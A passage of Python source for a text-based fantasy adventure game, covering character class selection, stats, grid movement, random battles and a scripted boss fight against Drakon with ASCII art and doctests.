board[(1, 1)] = ['Margrove Pass']\n board[(2, 3)] = [\"Entia Lake\"]\n board[(4, 3)] = [\"Drakon's Castle\"]\n board[(1, 4)] = [\"Entia Capital City\"]\n board[(0, 4)] = [\"Makna Harbour\"]\n board[(3, 3)] = [\"Satorl Forest\"]\n return board\n\n\ndef make_character() -> dict[str, int | str | typing.Any]:\n \"\"\"\n character creation function. 
Name your character and choose a class to play.\n\n :return: a dictionary containing information about the character\n \"\"\"\n character = input('Input your name: \\n')\n player_info = {'Name': character, 'X': 0, 'Y': 0, 'Level': 1, 'Current_HP': 34, 'Max_HP': 34, 'XP': 0, 'Class': 'Basic', 'Boss_Status': 'Alive'}\n\n def character_class() -> list:\n \"\"\"\n choose from a list of classes and their subclasses\n\n :return: a list containing the class and subclass that the user chooses\n \"\"\"\n sub_class_choice = ''\n print('\\nIn the vast lands of Entia, there are 3 warrior professions, each excelling in different categories.'\n f'\\nSwordsman: Masters of the sword, guarantees high damage output, but at a cost.'\n f'\\nMage: Masters of magic. Cast down elementals that deal a good amount of damage'\n f'\\nTank: High defence, can sponge a lot of hits before going down.\\n')\n while True:\n main_class = ['Swordsman', 'Mage', 'Tank']\n for index in enumerate(main_class):\n print(index)\n class_options = input('\\nChoose a profession: \\n').title()\n\n if class_options == '0':\n class_choice = 'Swordsman'\n break\n elif class_options == '1':\n class_choice = 'Mage'\n break\n elif class_options == '2':\n class_choice = 'Tank'\n break\n else:\n print('Invalid profession!\\n')\n\n print('Great! You chose', class_choice)\n print(\"Now it's time to select a subclass...\")\n\n if class_options == '0':\n print('''\\nThere are two types of swordsmen, each providing their pros and cons\n Samurai: Dances around the battlefield with their swift movement, striking their opponents down with a katana. [High damage, low defence].\n Berserker: An immovable object meets an unstoppable force to form a warrior who stops at nothing to strike the enemy down. [High damage, high defence].\\n''')\n while True:\n sword_sub = ['Samurai', 'Berserker']\n for index in enumerate(sword_sub):\n print(index)\n sub_class_options = input('Choose a subclass: \\n 0: Samurai \\n 1: Berserker \\n').title()\n if sub_class_options == '0':\n sub_class_choice = 'Samurai'\n break\n elif sub_class_options == '1':\n sub_class_choice = 'Berserker'\n break\n else:\n print('Invalid sub class!')\n elif class_options == '1':\n print('''\\nThere are two types of mages, each casting their own unique elementals\n Sorcerer: Specializes in sorcery, witchcraft and black magic. [High damage, low defence, high mana consumption].\n Elementalist: Utilizes the four elementals to inflict damage on their foes. [Medium damage, medium defence, medium mana consumption].\\n''')\n while True:\n mage_sub = ['Sorcerer', 'Elementalist']\n for index in enumerate(mage_sub):\n print(index)\n sub_class_options = input('\\nChoose a subclass:').title()\n if sub_class_options == '0':\n sub_class_choice = 'Sorcerer'\n break\n elif sub_class_options == '1':\n sub_class_choice = 'Elementalist'\n break\n else:\n print('Invalid sub class!')\n elif class_options == '2':\n print('''\\nThere is only one Tank type\n Paladin: The only tank type. Never afraid of a fight with their high hp, and armour to tank all the hits. [Low damage, very high defence].\\n''')\n while True:\n sub_class_options = input('Choose a subclass: \\n Paladin \\n').title()\n if sub_class_options == 'Paladin':\n sub_class_choice = 'Paladin'\n break\n else:\n print('Invalid sub class!')\n\n print('\\nGreat! 
you have finished character customization!\\n\\n')\n print('Class:', class_choice, '\\nSub Class:', sub_class_choice)\n return [class_choice, sub_class_choice]\n\n player_class = character_class()\n player_info['Class'] = player_class[1]\n return player_info\n\n\ndef player_stats(character: dict) -> dict:\n \"\"\"\n sets stats for the character after choosing a subclass\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: inputs information about the character to the dictionary\n :return: a dictionary with character information\n >>> player_stats({'Class': 'Samurai'})\n {'Class': 'Samurai', 'Current_HP': 56, 'Max_HP': 56, 'Attack': 29, 'Defence': 12}\n >>> player_stats({'Class': 'Sorcerer'})\n {'Class': 'Sorcerer', 'Current_HP': 48, 'Max_HP': 48, 'Attack': 34, 'Defence': 11}\n \"\"\"\n if character['Class'] == 'Samurai':\n character['Current_HP'] = 56\n character['Max_HP'] = 56\n character['Attack'] = 29\n character['Defence'] = 12\n elif character['Class'] == 'Berserker':\n character['Current_HP'] = 67\n character['Max_HP'] = 67\n character['Attack'] = 21\n character['Defence'] = 21\n elif character['Class'] == 'Sorcerer':\n character['Current_HP'] = 48\n character['Max_HP'] = 48\n character['Attack'] = 34\n character['Defence'] = 11\n elif character['Class'] == 'Elementalist':\n character['Current_HP'] = 73\n character['Max_HP'] = 73\n character['Attack'] = 18\n character['Defence'] = 18\n elif character['Class'] == 'Paladin':\n character['Current_HP'] = 87\n character['Max_HP'] = 87\n character['Attack'] = 14\n character['Defence'] = 28\n return character\n\n\ndef player_move_set(character: dict) -> dict:\n \"\"\"\n sets the players move set after choosing a subclass\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: inputs character move set into the dictionary\n :return: a dictionary containing character information\n >>> player_move_set({'Class': 'Basic', 'Attack': 34})\n {'Class': 'Basic', 'Attack': 34, 'Move_Set': {'Run': 0, 'Punch': 34}}\n \"\"\"\n special = random.randint(5, 16)\n character['Move_Set'] = {'Run': 0}\n if character['Class'] == 'Basic':\n character['Move_Set']['Punch'] = character['Attack']\n elif character['Class'] == 'Samurai':\n character['Move_Set']['Swift Strike'] = character['Attack']\n character['Move_Set']['Shadow Blade'] = character['Attack'] + special\n character['Move_Set']['Soul Strike'] = character['Attack'] - 10\n elif character['Class'] == 'Berserker':\n character['Move_Set']['Running Slash'] = character['Attack']\n character['Move_Set']['Punishing Blow'] = character['Attack'] * 2\n character['Move_Set']['Crushing Knee'] = character['Attack'] - special\n elif character['Class'] == 'Sorcerer':\n character['Move_Set']['Magic Missile'] = character['Attack']\n character['Move_Set']['Pentagram Beam'] = character['Attack'] * special\n character['Move_Set']['Starlight Kick'] = character['Attack'] - 5\n elif character['Class'] == 'Elementalist':\n character['Move_Set']['Howling Wind'] = character['Attack']\n character['Move_Set']['Fire-Lightning Ball'] = character['Attack'] - 10\n character['Move_Set']['Enchanting Water Spirit'] = character['Attack'] * 3\n elif character['Class'] == 'Paladin':\n character['Move_Set']['Hammer Down'] = character['Attack']\n character['Move_Set'][\"Paladin's Fury\"] = character['Attack'] + special\n return character\n\n\ndef describe_current_location(board: dict, character: dict) -> tuple:\n \"\"\"\n describes to the user where they 
are on the board.\n\n :param board: a dictionary\n :param character: a dictionary\n :precondition: board must be a dictionary\n :precondition: character must be a dictionary\n :postcondition: checks where the player is in relation to the board\n :postcondition: prints a description of the player's current location\n :return: a tuple containing the player's current coordinates\n >>> describe_current_location({(2, 2): ['Entia Field']}, {'X': 2, 'Y': 2})\n You are located at (2, 2) ['Entia Field']\n A vast field connecting each part of Entia\n (2, 2)\n >>> describe_current_location({(4, 3): ['Entia Capital City']}, {'X': 4, 'Y': 3})\n You are located at (4, 3) ['Entia Capital City']\n The capital city of Entia, houses many shops to buy goods from.\n (4, 3)\n \"\"\"\n character_location = character['X'], character['Y']\n print(f'You are located at', character_location, board[character_location])\n if board[character_location] == ['Entia Field']:\n print(f'A vast field connecting each part of Entia')\n elif board[character_location] == ['Entia Capital City']:\n print(f\"The capital city of Entia, houses many shops to buy goods from.\")\n elif board[character_location] == ['Entia Lake']:\n print(f\"Home of the Varya, Entia's water tribe. Very deadly if you get on the wrong terms.\")\n elif board[character_location] == ['Makna Harbour']:\n print(f\"Many imports come this way. All goods are brought to Drakon.\")\n elif board[character_location] == [\"Satorl Forest\"]:\n print(f\"Home of Drakon. This area is mostly dead and all signs of civilization have vanished.\")\n elif board[character_location] == ['Stowry Village']:\n print(f\"{character['Name']}'s home. There is a very nostalgic feeling every time you are here...\")\n print(f\"If you are ever in need of health, come here to restore some health!\")\n if character['Current_HP'] < character['Max_HP']:\n character['Current_HP'] = character['Max_HP']\n print(f'Your health has been restored to max!')\n elif board[character_location] == ['Margrove Pass']:\n print(\n 'The border between Stowry Village and Entia Field. This desolate area keeps the residents of Stowry stuck. Home to many monsters...')\n return character_location\n\n\ndef get_user_choice() -> str:\n \"\"\"\n user picks a direction to go\n\n :return: a string containing the user's choice\n \"\"\"\n directions = ['North', 'East', 'South', 'West', 'Quit']\n while True:\n for index in enumerate(directions):\n print(index)\n user_choice = input('\\nPick a direction to move: \\n')\n if user_choice == '0':\n user_choice = 'North'\n break\n elif user_choice == '1':\n user_choice = 'East'\n break\n elif user_choice == '2':\n user_choice = 'South'\n break\n elif user_choice == '3':\n user_choice = 'West'\n break\n elif user_choice == '4':\n print('GAME OVER!')\n sys.exit()\n else:\n print('Invalid option, please type something from this list\\n\\n')\n return user_choice\n\n\ndef validate_move(character: dict, direction: str) -> bool:\n \"\"\"\n validates the move of the character. 
checks if the move that they are doing is valid.\n\n :param character: a dictionary\n :param direction: a string\n :precondition: character must be a dictionary\n :precondition: direction must be a string\n :postcondition: checks if the player's coordinates are out of bounds\n :postcondition: checks if the direction is a valid direction\n :return: a boolean value depending on if the user's move is valid\n >>> validate_move({'Y': 4}, 'North')\n False\n >>> validate_move({'Y': 4}, 'South')\n True\n \"\"\"\n if direction == 'North' and character['Y'] == 4:\n return False\n elif direction == 'South' and character['Y'] == 0:\n return False\n elif direction == 'East' and character['X'] == 4:\n return False\n elif direction == 'West' and character['X'] == 0:\n return False\n else:\n return True\n\n\ndef move_character(character: dict, direction: str) -> None:\n \"\"\"\n will move the character depending on their move\n\n :param character: character is a dictionary\n :param direction: direction is a string\n :precondition: character must be a dictionary\n :precondition: direction must be a string\n :postcondition: change the player's coordinates depending on their move\n :postcondition: checks the direction to see where to move the character\n :return: does not return anything\n >>> move_character({'Y': 1}, 'North')\n\n >>> move_character({'X': 3}, 'East')\n\n \"\"\"\n if direction == 'North':\n character['Y'] += 1\n elif direction == 'East':\n character['X'] += 1\n elif direction == 'South':\n character['Y'] -= 1\n elif direction == 'West':\n character['X'] -= 1\n\n\ndef check_for_challenges(character: dict) -> bool:\n \"\"\"\n checks if there is a challenge\n\n :param character: character is a dictionary\n :precondition: character must be a dictionary\n :postcondition: checks if there is a challenge for the user\n :return: returns a boolean value depending on if there is a challenge for the user\n >>> check_for_challenges({'X': 1, 'Y': 0})\n True\n >>> check_for_challenges({'X': 0, 'Y': 0})\n False\n \"\"\"\n if character['X'] == 1 and character['Y'] == 0:\n return True\n elif character['X'] == 0 and character['Y'] == 1:\n return True\n elif character['X'] == 1 and character['Y'] == 1:\n return True\n elif character['X'] == 4 and character['Y'] == 3:\n return True\n\n is_battle = random.randint(0, 20)\n if is_battle > 15:\n return True\n else:\n return False\n\n\ndef execute_challenge_protocol(character: dict) -> None:\n \"\"\"\n will execute a challenge for the user depending on their level\n\n :param character: character is a dictionary\n :precondition: character must be a dictionary\n :postcondition: execute a challenge for the user depending on their level\n :return: None\n \"\"\"\n if character['Level'] == 1:\n return execute_battle(character, 'easy')\n elif character['Level'] == 2:\n return execute_battle(character, 'medium')\n elif character['Level'] == 3:\n return execute_battle(character, 'hard')\n\n\ndef execute_battle(character: dict, difficulty: str) -> None:\n \"\"\"\n checks the user's level and scales the enemies damage. 
Then it initiates the battle sequence.\n\n :param character: character is a dictionary\n :param difficulty: difficulty is a string\n :precondition: character must be a dictionary\n :precondition: difficulty must be a string\n :postcondition: scales the enemy's stats according to the difficulty\n :postcondition: runs the battle loop until one side is defeated\n :return: None\n \"\"\"\n enemy = choose_enemy(character)\n if enemy['Name'] == \"Drakon\":\n execute_boss(character, enemy)\n return None\n if difficulty == 'medium':\n enemy['Attack'] *= 2\n enemy['Current_HP'] *= 2\n enemy['Max_HP'] *= 2\n enemy['Defence'] *= 2\n if difficulty == 'hard':\n enemy['Attack'] *= 3\n enemy['Current_HP'] *= 3\n enemy['Max_HP'] *= 3\n enemy['Defence'] *= 3\n while enemy['Current_HP'] > 0:\n if character['Current_HP'] <= 0:\n print(f'GAME OVER! Your journey comes to an unfortunate end...')\n print(f'\\nThanks for playing!')\n sys.exit()\n print(f\"You are going against {enemy['Name']}\")\n print(\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n if user_choice == 0:\n print(f'You ran away! What a bummer...')\n print(f\"You lose {enemy['Attack']} HP\")\n character['Current_HP'] -= enemy['Attack']\n return None\n elif user_choice < len(character['Move_Set'].keys()):\n move = (character['Move_Set'][list(character['Move_Set'].keys())[user_choice]])\n enemy['Current_HP'] -= move\n print('You dealt', move, 'Damage!')\n if random.randint(0, 1) == 1:\n character['Current_HP'] -= enemy['Attack']\n print(f\"{enemy['Name']} dealt {enemy['Attack']} damage!\")\n else:\n print(f\"{enemy['Name']} missed!\")\n else:\n print(f\"Invalid selection, please select a number from the move set\")\n\n print(f'You defeated {enemy[\"Name\"]}!')\n character['XP'] += enemy['XP_Gain']\n\n\ndef filtered_enemies(enemies: dict) -> bool:\n \"\"\"\n checks if an enemy is a 'varyan' or a 'guard'\n\n :param enemies: a dictionary\n :precondition: enemies must be a dictionary\n :postcondition: checks if the enemy is of a specific type\n :return: a boolean indicating whether the enemy is one of those types\n >>> filtered_enemies({'Name': 'varyan'})\n True\n >>> filtered_enemies({'Name': 'hotdog'})\n False\n \"\"\"\n if enemies['Name'] != \"varyan\" and enemies['Name'] != \"guard\":\n return False\n else:\n return True\n\n\ndef choose_enemy(character: dict) -> dict:\n \"\"\"\n choose the enemy for the user to fight\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: randomly select an enemy for the user to battle\n :return: a dictionary containing the chosen enemy's information\n \"\"\"\n varyan = {'Name': 'Varyan Warrior', 'Current_HP': 37, 'Max_HP': 37, 'Attack': 18, 'Defence': 17, 'XP_Gain': 177}\n guard = {'Name': 'Demon Guard', 'Current_HP': 54, 'Max_HP': 54, 'Attack': 34, 'Defence': 32, 'XP_Gain': 254}\n imp = {'Name': 'Imp', 'Current_HP': 13, 'Max_HP': 13, 'Attack': 9, 'Defence': 9, 'XP_Gain': 56}\n goblin = {'Name': 'Goblin', 'Current_HP': 19, 'Max_HP': 19, 'Attack': 16, 'Defence': 17, 'XP_Gain': 123}\n slime = {'Name': 'Slime', 'Current_HP': 7, 'Max_HP': 7, 'Attack': 5, 'Defence': 4, 'XP_Gain': 43}\n drakon = {'Name': \"Drakon\", 'Current_HP': 256, 'Max_HP': 256, 'Attack': 82, 'Defence': 54}\n rand_num = random.randint(0, 1)\n enemies = [varyan, guard, imp, goblin, slime, drakon]\n harbour_guard = [varyan, guard]\n selection = random.randint(0, 2) # randomly pick one of the three field enemies below\n _ = 
filter(filtered_enemies, enemies)\n final_selection = harbour_guard[rand_num]\n if character['X'] == 2 and character['Y'] == 3:\n return varyan\n if character['X'] == 4 and character['Y'] == 3 and character['Level'] == 3:\n return drakon\n if character['X'] == 0 and character['Y'] == 4:\n return final_selection\n if selection == 0:\n return imp\n elif selection == 1:\n return goblin\n else:\n return slime\n\n\ndef execute_boss(character: dict, enemy: dict) -> None:\n \"\"\"\n the final boss battle. the user must be level three for this function to initiate\n\n :param character: a dictionary\n :param enemy: a dictionary\n :precondition: character must be a dictionary\n :precondition: enemy must be a dictionary\n :postcondition: will initiate the final boss battle\n :postcondition: will initiate the final boss battle\n :return: None\n >>> execute_boss({'Level': 3, 'X': 4, 'Y': 3, 'XP': 0, 'Current_HP': 540, 'Max_HP': 540, 'Attack': 156, 'Defence': 156, 'Class': 'Basic', 'Move_Set': {'Run': 0, 'Punch': 156}},{'Name': \"Drakon\", 'Current_HP': 256, 'Max_HP': 256, 'Attack': 82, 'Defence': 54})\n\n \"\"\"\n print('''\n\n\n ε ╣],\n Γ]╣╪╠▓▓╣▒ ⌐\n [╫▐╣▓╬▓▓╬▓▌▓ ƒ\n ╣▓▓▓▓▓╬▓╣▓▓╬▓▌\n ~- ╗█▓▓█▓▓▓▓▓▓▓▓╬▓ É\n ,,,\"w▌, ▐▓▓█╨╙▓▓█▀╙██▓█▌ - ,╓≈\"`\n .,╠▓▓▓▓▓▓▓▓▓▄,╙██▒∩».└ ;░╠███▓▓▓╠▄▄▓▓▓╨╙╙└\n `\"\"▓▓▓███████████▓╬╝▌#µ░░φå▌╬████████▓█▓▓▓▓Mw\n ▄▀▀└,▄▄▓███████▀╙╙╚▒└^│,│`╙╗╬░╙╟████████▌╙▀▓▓ └▀w,\n ,▄▓▓▀╠▓███████▒░░\"░╠╟▌▄▄▄▄╬╩░░░φ█████████▓▌ ▀▄\n ╓▀─ ▄█▀▓████████▌░░░░≥╚▓▓▓▌Å░░░╔▓██████▓^~╙╙▀▄ └╕\n ,¬ ▄▀└╓▀▓█████████▓▓▓▄▒╠╥,▄▓▓█▓▓█████████▓▄ ▀\n ▓─ Æ.█████▀ ▀███▓▄╬▀████╬▓▓██████▀╙▀███▓─\n └ ' ▓███▀ ╟█████▓██████╣████¬ └███▌\n ╫▓██╙ ╟███████████████⌐ ╟██╠▒\n @╣█▌ ╙██████████████▓▄▄, ▓╬▓╬╕\n ╬╬▓▌ ╟████████████▌██████▓▄▀███▄\n ╬╠██▀ ,#▓▓███▓▓▓█████▓▄▄▀█████▓╬╬╬▓▌\n ▒╬╬█▄ ╣▓▀██▓╬▓████▓▒▒╬██▓ ╙▀██████▓▓^\n ╚╘██╬╬µ ▄▓╙╬▓█████████╬█▓▓▓▓▌ └╙▀▀╟\n ¬▓█▓╢ ███▓██▓▓▒▒╠░╠▒╟▓▌▓╬███▄\n ╙██▄ ╫███████████▓█▓█████████▄\n ╙██▄ ▓█████████████████████████\n █╬▌µ██████████████████████▓▓██▒\n ▓█╬╬▓████████████████████▓▓▓█▌\n ╬╠╬╬███j████████╟██▌██████╬╬▓Γ\n ▒╠▓██ ` ╚└█╝╙█▀▌▐╣█ Γ█▌▀███▒╬\n ▐▓╬█▌▀⌐ ╟ ╙▌ ▐▌ █ ██░▒µ\n ▓█▓█ ¬ └ └ ████▌\n ''')\n print('\\n')\n print(f\"As you enter the castle, you get a trickling feeling down your spine. Something is clearly off...\")\n time.sleep(2)\n print(f\"Step by step you make ur way up the castle\")\n time.sleep(2)\n print(f\"Drakon: Who dares step foot here?\")\n time.sleep(2)\n print(f\"*Deep gulp. \\n{character['Name']}: The person who will put an end to the suffering you caused on Entia\")\n time.sleep(2)\n print(f\"Drakon: MWAHAHAHAHA... Don't make me laugh...\")\n print(f\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n print(f'You chose', list(character[\"Move_Set\"].keys())[user_choice])\n time.sleep(2)\n print(f'Drakon: PATHETIC!')\n time.sleep(2)\n print(f'Drakon: Let me show you what true power looks like')\n time.sleep(2)\n print(f'\\n\\nDrakon uses Spacial Magic: Eternal Space')\n time.sleep(2)\n print(f'\\n\\nYou feel the ground shaking from below and notice cracks start to form on the floor. Everything begins to shake...')\n time.sleep(5)\n print(f'Drakon: WELCOME TO MY DOMAIN')\n time.sleep(2)\n print(f'You feel weak! Your attacks do half damage to Drakon... Annoying!')\n time.sleep(1)\n while enemy['Current_HP'] > 100:\n print(character)\n if character['Current_HP'] < 0:\n print(f'GAME OVER! 
Drakon still reigns over the land and your story comes to an unfortunate end...')\n print(f'\\nThanks for playing!')\n sys.exit()\n print(\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n if user_choice == 0:\n print(f'You ran away! What a bummer...')\n print(f\"You lose {enemy['Attack']} HP\")\n character['Current_HP'] -= enemy['Attack']\n return None\n elif user_choice < len(character['Move_Set'].keys()):\n move = (character['Move_Set'][list(character['Move_Set'].keys())[user_choice]]) // 2\n enemy['Current_HP'] -= move\n print(f'You dealt', move, 'Damage!')\n if random.randint(0, 1) == 1:\n character['Current_HP'] -= enemy['Attack']\n print(f\"{enemy['Name']} dealt {enemy['Attack']} damage!\")\n else:\n print(f\"{enemy['Name']} missed!\")\n else:\n print(f\"Invalid selection, please select a number from the move set\")\n print(f'\\n\\nDrakon: ARGH')\n time.sleep(2)\n print(f\"{character['Name']}: It's time to put an end to this\")\n time.sleep(2)\n print(f\"Drakon: IT'S\")\n time.sleep(2)\n print(f\"Drakon: NOT\")\n time.sleep(2)\n print(f\"Drakon: OVER\")\n time.sleep(2)\n print(f\"\\n\\nDrakon Uses: ᚷᛁᚨᚾᛏ ᚠᛟᚱᛗᚢᛚᚨ\\n\\n\")\n time.sleep(2)\n print('''\n\n , ▓█\n ╗▌ ▐██▓\n ▐⌐ ]. ╓█▌]███▓▌ ]▌ ║▄\n ▓▌ ╓█▒ ]██▒█████▓▌ ╟█▌ █▓▌\n ▐█▓▒ ╔██▌]██▓▓█████▓▓▌██▓▌ ╫█▓▓▌\n ╓██▓▓▄███▓███▓██████▓▓▓██▓▓▄██▓▓▓▌\n ] ▄███▓████████████████▓▓▓▓█▓▓▓██▓▓▓▓▒\n ▓▒▐██████████████████████▓▓▓▓▓▓▓▓█▓▓▓▓▓ ]╕\n ╟█▌███████████████████████▓▓▓▓▓▓▓▓█▓▓▓▓▓▌ ]█▒\n j██▓███████████████████████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▄█▓▒ ,╕\n ▓██▓██████████████████████▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓██▓▒ ▄█⌐\n ╓ ]███████████████████████████▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▒▓█▓\n ╙█,╟███████████████████████████▓▓▓▓▓▓▓█▓█▓▓▓▓█▓▓▓██▓▓\n \"██▓█╬██████████▓▒╠╠╠▀╬████████▓▓▓▓█▓╨▀██▓▓▓█▓▓▓██▓▓▌\n ╟▌░████╬█████▓█╬▒╠╠╠╠╠╠╠╠╠░▒█████▓▓▓▓█╩ └ ╙███▓╬▀▀╩╫▓\n ██▓█████████▓▒╠╠╠╠╠╠╠╠╠╠╠╠╠╠╣███▓▓▀▐╙ ▐▓▓▓▓▌░╟▓,▄∩\n ╙███████████▌╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠▀▓▓└ ╠╠█▓█▓║▓█▓┘\n ██████████╬░░╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠ ╠╠▓██��▓█▌,,\n ╙███████▌╠╠╠▒╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠╠⌐ ╙╠╣█▓▓▓██▓╙\n '▓█████▌▒╣▒╠╔╠╠╠╠╠╠▒╠╠φ╦╚░╠╩░▒▒▒ε . \"\" └╠╬█▓▓▓╨\n .φ╠╙▀██╬╠╫█▒╠╠▄▓▓██▓█▓▄▒╩╩░▒▒▒▒▒╠╔░ ,╓φφφφ╔, ╠╣█▓░\n ╔╠╙╣▒▒╖╙▀╠▒╬█████╬╬╬▓▒╙╙██▒╚▒▒▒▒╠╠╠╓▒███▀▀███▄█▀░▒,»\n ⁿ╠░╬╠▒╬▒╠╦╠╠╠▀███╬▓████▒╠╠█▒░╚▒╠╠]╠╠╟█╬╬▄██▄╓██▒▐▓╙╚ '\n ╚╠╦ └╙▀▒╠╠╩╠╠╠██▓▓████░╠▒██▄≥░╠╠╠╩╣█╬▓╠████▒╣█╠╠▒▄ '\n `╚╠╦▒╠╠╠╠░╠╠╠░╣██╬╬▓▓▓▓█▌░░░╙╓,┐~╙██╬▓╬╬╬▒▄█▌╠╩╬,⌐\n \"╙╙\"╚╠╬╫▄▒╠░╬╬╬╬╬╬░╩╙╔╠▒╙ .\"'^Ç ╨▀▀▀▀▀╨╙]╠φ╬ε\n '╠╠╠▓█▌╠╠╠╠╠▒▒▒▒╠╠╠½∩ ▓ ⌐ └└ ,▄╛╚▄Γ\n `╠╠╠███▄╓╠╠╠▒╠▒╠╠'╫▒ ,╙,░ ╠▒▓▓█\" ▐╚∩\n `╠╠╠╬███▓▒▒▒╠╠╠╠▒╠╠Γ'^^`^^\"\"\"j█▀╠└ ╔▓▓▒▒\n ]╠╠╠╠░╬██████████▓▄▄▓▓▓▓▓▓▓▓█▌╠╙ `╫▓╩\n └╠▒╙╚╠▒████▓███████▓█▓█▓██▀└]╠'\n ╚▒╠╠╠█████████████████▌ ≤╙\n ╓▄▄▄▓██████▌╠░▀██████████████▀¿\n ,▄▓██████▀▀▀█╙╝▀█▓▒╠╠░╬╬╬░,╓,╙╙╙└╓███▓▄\n ╙?██▒╠╠░╠╠╠╠╙╙╙░ ,╙\" └^ └\n .█▒\"▒╠╠╠╠╠╡ .\n .▓▌ \"██▄╩╠╠▒╓╓»≈~\n ]█▒ !███ █▌\n ╟▌ ▄███▄ ╫▒\n j▌▐█████▓░╫,\n ,█▐█╩ ╙██▌█\n `██▌ █▒█▌\n 7█╟█ .█╩▓█⌐\n ╟▄ .█\n .█, ╟▒\n .█. ╟▌\n ▀ '▀\n ''')\n time.sleep(2)\n print(f\"\\n\\nDrakon is in his giant form. His hits deal a lot of damage, but he has a low chance of hitting. \"\n f\"You feel a rush of fury over you! Your attacks do normal damage and you gain a x2 health boost\")\n enemy['Current_HP'] = enemy['Max_HP'] * 3\n enemy['Attack'] = 119\n character['Current_HP'] = character['Max_HP'] * 2\n while enemy['Current_HP'] > 0:\n if character['Current_HP'] <= 0:\n print(f'GAME OVER! 
Drakon still reigns over the land and your story comes to an unfortunate end...')\n print(f'\\nThanks for playing!')\n sys.exit()\n print(\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n if user_choice == 0:\n print(f'You ran away! What a bummer...')\n print(f\"You lose {enemy['Attack']} HP\")\n character['Current_HP'] -= enemy['Attack']\n return None\n elif user_choice < len(character['Move_Set'].keys()):\n move = (character['Move_Set'][list(character['Move_Set'].keys())[user_choice]])\n enemy['Current_HP'] -= move\n print(f'You dealt', move, 'Damage!')\n if random.randint(0, 1) == 1:\n character['Current_HP'] -= enemy['Attack']\n print(f\"{enemy['Name']} dealt {enemy['Attack']} damage!\")\n else:\n print(f\"{enemy['Name']} missed!\")\n else:\n print(f\"Invalid selection, please select a number from the move set\")\n print(f\"Drakon: HOW\")\n time.sleep(2)\n print(f\"{character['Name']}: Your reign ends here, Drakon. Entia won't have to worry about you any longer\")\n time.sleep(2)\n call = list(itertools.repeat('DAMN IT', 10))\n string = ''\n for index in call:\n string += ' ' + index\n\n print(string)\n time.sleep(2)\n print(f\"What's your move?\")\n for index in enumerate(character['Move_Set']):\n print(index)\n user_choice = int(input(''))\n print(f'You chose', list(character[\"Move_Set\"].keys())[user_choice])\n time.sleep(2)\n print(f'Drakon: ARRGHHHHH')\n character['Boss_Status'] = 'Dead'\n return None\n\n\ndef check_if_goal_attained(character: dict) -> bool:\n \"\"\"\n checks if the user has beaten the boss\n\n :param character: character is a dictionary\n :precondition: character must be a dictionary\n :postcondition: will check if the user beat the boss\n :return: a boolean value depending on if the boss is dead or not\n >>> check_if_goal_attained({'Boss_Status': 'Dead'})\n True\n >>> check_if_goal_attained({'Boss_Status': 'Not Dead'})\n False\n >>> check_if_goal_attained({'Boss_Status': 'Chicken Noodle Soup'})\n False\n \"\"\"\n if character['Boss_Status'] == 'Dead':\n return True\n else:\n return False\n\n\ndef character_has_leveled(character: dict) -> bool:\n \"\"\"\n checks if the character has leveled up\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: will let the player know that they leveled up\n :return: a boolean value depending on if the character has leveled up\n >>> character_has_leveled({'Name': 'PLACEHOLDER', 'XP': 501, 'Level': 1})\n ▄█ ▄████████ ▄█ █▄ ▄████████ ▄█ ███ █▄ ▄███████▄\n ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███\n ███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███\n ███ ▄███▄▄▄ ███ ███ ▄███▄▄▄ ███ ███ ███ ███ ███\n ███ ▀▀███▀▀▀ ███ ███ ▀▀███▀▀▀ ███ ███ ███ ▀█████████▀\n ███ ███ █▄ ███ ███ ███ █▄ ███ ███ ███ ███\n ███▌ ▄ ███ ███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███\n █████▄▄██ ██████████ ▀██████▀ ██████████ █████▄▄██ ████████▀ ▄████▀\n ▀ ▀\n Great job PLACEHOLDER! 
You are one step away from Drakon.\n True\n \"\"\"\n if character['XP'] >= 500:\n print(' ▄█ ▄████████ ▄█ █▄ ▄████████ ▄█ ███ █▄ ▄███████▄ \\n'\n '███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ \\n'\n '███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███ \\n'\n '███ ▄███▄▄▄ ███ ███ ▄███▄▄▄ ███ ███ ███ ███ ███ \\n'\n '███ ▀▀███▀▀▀ ███ ███ ▀▀███▀▀▀ ███ ███ ███ ▀█████████▀ \\n'\n '███ ███ █▄ ███ ███ ███ █▄ ███ ███ ███ ███ \\n'\n '███▌ ▄ ███ ███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███ \\n'\n '█████▄▄██ ██████████ ▀██████▀ ██████████ █████▄▄██ ████████▀ ▄████▀ \\n'\n '▀ ▀ ')\n character['XP'] -= 500\n character['Level'] += 1\n if character['Level'] == 3:\n print(f\"Great job {character['Name']}! The cloudy skies start to darken at Drakon's Castle (4, 3).\"\n f\" It's time to put an end to the wrath put down on Entia.\")\n return True\n else:\n print(f\"Great job {character['Name']}! You are one step away from Drakon.\")\n return True\n return False\n\n\ndef execute_glow_up_protocol(character: dict) -> dict:\n \"\"\"\n updates the character's stats once the character levels up\n\n :param character: a dictionary\n :precondition: character must be a dictionary\n :postcondition: updates the character's stats once the player levels up\n :return: a dictionary containing character information with updated stats\n >>> execute_glow_up_protocol({'Class': 'Samurai', 'Current_HP': 0, 'Max_HP': 0, 'Attack': 0, 'Defence': 0})\n {'Class': 'Samurai', 'Current_HP': 56, 'Max_HP': 56, 'Attack': 35, 'Defence': 12}\n >>> execute_glow_up_protocol({'Class': 'Sorcerer', 'Current_HP': 0, 'Max_HP': 0, 'Attack': 0, 'Defence': 